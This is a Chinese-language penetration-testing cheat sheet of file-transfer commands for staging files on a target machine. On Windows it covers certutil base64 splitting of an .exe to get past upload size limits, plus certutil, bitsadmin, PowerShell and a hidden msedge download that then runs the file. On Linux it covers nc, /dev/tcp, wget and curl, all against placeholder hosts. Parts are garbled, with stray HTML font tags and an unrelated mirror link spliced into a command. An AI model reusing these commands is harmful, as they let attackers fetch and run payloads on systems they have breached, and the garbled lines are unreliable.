远程下载上传命令(绕过大小限制)
python起http服务
- python3 -m http.server 5003
python2 -m SimpleHTTPServer 5003
上传时遇到限制上传大小时:
编码base64:certutil -encode yb.exe 1.txt
可以把1.txt拆成三个txt,分块上传后,再使用
copy c:\*txt c:\123.txt //把c盘根目录下的所有txt合并为123.txt
certutil -decode 123.txt 123.exe
window远程下载文件命令
<font style="color:rgb(0, 0, 0);">certutil -urlcache -split -f </font>https://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font>
bitsadmin /rawreturn /transfer getfile https://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font> D:\1.txt
注意bitsadmin 需要指定绝对路径
cmd /c start /min msedge.exe http://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font> && timeout 5 && taskkill /f /t /im msedge.exe && C:/Users/%UserName%/Downloads/test.zip
<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">curl http://xx.xx.xx.xx/test.zip -o c:\test.zip</font>
powershell -w "Invoke-WebRequest -Uri http://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font> -OutFile a.txt"
<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">powershell -Command "Invoke-WebRequest -Uri '</font>http://<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">xx.xx.xx.xx/test.zip</font>['](https://mirrors.aliyun.com/ubuntu/indices/override.artful-backports.main')<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);"> -OutFile 'test.txt'"</font>
<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">powershell -w "Start-BitsTransfer -Source $url -Destination $output"</font>
<font style="color:rgb(0, 0, 0);background-color:rgb(244, 244, 244);">powershell -Command "Start-BitsTransfer -Source 'url' -Destination 'test.txt'"</font>
linux远程下载命令
- 服务端命令:nc -lvvp 11111 < name 接收端命令:nc [服务端IP] 11111 > name_received
- cat /dev/tcp/xxx.xxx.xxx/11111 >name
- base64 -d /dev/tcp/xxx.xxx.xxx/11111 > name
- wget http://xx.xx.xx.xx/test.zip
- curl http://xx.xx.xx.xx/test.zip -o c:\test.zip